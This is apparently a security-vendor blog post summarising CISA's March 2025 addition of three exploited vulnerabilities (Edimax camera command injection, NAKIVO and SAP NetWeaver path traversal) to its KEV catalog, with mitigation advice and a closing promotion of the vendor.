CISA adds CVE-2025-1316, CVE-2024-48248, and CVE-2017-12637 to its KEV Catalog, warning of active exploitation targeting critical systems and services.

One of the most concerning vulnerabilities in the new CISA catalog is CVE-2025-1316, which affects the Edimax IC-7100 IP Camera. This vulnerability, identified on March 4, 2025, is an OS Command Injection Vulnerability that allows attackers to execute arbitrary commands on the device remotely.  

The Edimax IC-7100 does not properly neutralize special characters used in OS commands, leaving it open to exploitation. Malicious actors can craft specific requests to inject malicious code into the camera’s operating system, leading to remote code execution and unauthorized access to the device. 

The impact of this vulnerability is severe, as it enables attackers to gain control over the device, potentially accessing sensitive video surveillance data or compromising the network. A CVSS v4 score of 9.3 has been assigned to CVE-2025-1316, indicating the critical nature of the flaw.  

CISA strongly recommends that organizations using Edimax IC-7100 IP Cameras take immediate action to mitigate the risk, including network isolation, the use of firewalls, and the deployment of Virtual Private Networks (VPNs) to protect control systems from external threats. 

CVE-2024-48248: Absolute Path Traversal Vulnerability in NAKIVO Backup and Replication 

Another serious vulnerability added to CISA’s catalog is CVE-2024-48248, a Traversal Vulnerability in NAKIVO Backup and Replication. This flaw, which was discovered in March 2025, allows attackers to exploit the application’s handling of file paths, enabling them to access unauthorized directories on the system. This vulnerability is a classic case of absolute path traversal, where attackers can manipulate file paths to navigate outside the expected directory structure, potentially reading sensitive files and compromising the system’s security. 

The flaw affects all versions of NAKIVO Backup and Replication prior to the patch release, and its exploitation can lead to data leakage or loss, exposing critical backup information. CISA emphasizes the importance of applying patches and updating to the latest software versions to prevent potential breaches. Organizations are advised to ensure proper access controls are in place and to regularly audit their systems for vulnerabilities related to path traversal. 

CVE-2017-12637: Directory Traversal Vulnerability in SAP NetWeaver 

The third vulnerability on CISA’s list is CVE-2017-12637, a Directory Traversal Vulnerability found in SAP NetWeaver, a widely used enterprise resource planning (ERP) system. This flaw, which was originally published in August 2017, has resurfaced in the context of ongoing exploitation. The vulnerability allows attackers to access arbitrary files by manipulating file paths in a web application’s query string, a technique known as directory traversal. 

In this case, the SAP NetWeaver Application Server Java 7.5 is vulnerable to exploitation via the UIUtilJavaScriptJS component. By sending specially crafted input that includes .. (dot dot) sequences, attackers can navigate outside the application’s root directory and access sensitive files on the underlying system. Exploiting this flaw can lead to the disclosure of confidential information, and in some cases, the ability to execute further attacks on the system. 

CISA urges SAP NetWeaver users to immediately apply security patches to resolve this issue and recommends conducting thorough security reviews to prevent similar vulnerabilities from being overlooked in the future. 

Conclusion  

Addressing vulnerabilities such as CVE-2025-1316, CVE-2024-48248, and CVE-2017-12637 is important for protecting critical infrastructure and sensitive data from exploitation. Organizations must remain proactive in implementing mitigation strategies recommended by CISA, such as updating systems, securing access, and isolating vulnerable devices.  

As the threat landscape evolves, the importance of leveraging advanced cybersecurity solutions cannot be overstated. Cyble, a leader in AI-driven cybersecurity, plays a crucial role in helping organizations stay protected from cyber adversaries. With its cutting-edge threat intelligence platforms, like Cyble Vision, Cyble empowers enterprises, government bodies, and law enforcement agencies to proactively detect and defend against cyber threats. 

References 

• https://www.cisa.gov/news-events/alerts/2025/03/19/cisa-adds-three-known-exploited-vulnerabilities-catalog 
• https://www.cve.org/CVERecord?id=CVE-2025-1316 
• https://www.cve.org/CVERecord?id=CVE-2024-48248 
• https://www.cve.org/CVERecord?id=CVE-2017-12637 

Disclaimer: This blog is based on our research and the information available at the time of writing. It is for informational purposes only and does not constitute legal, financial, or professional advice. While we strive for accuracy, we do not guarantee the completeness or reliability of the content. If any sensitive information has been inadvertently included, please contact us for correction. Cyble is not responsible for any errors, omissions, or decisions made based on this content. Readers should verify findings and seek expert advice where necessary. All trademarks, logos, and third-party content belong to their respective owners and do not imply endorsement or affiliation. All content is presented “as is” without any guarantee that it is free of confidential, proprietary, or otherwise sensitive information. If you believe any portion of this content contains inadvertently shared or sensitive data, please contact us immediately so that we may address and rectify the issue. No Liability for Errors or Omissions Due to the dynamic nature of cyber threat activity, this [blog/report/article] may include partial, outdated, or otherwise incorrect information due to unverified sources, evolving security threats, or human error. We expressly disclaim any liability for errors or omissions or any potential consequences arising from the use, misuse, or reliance on this information.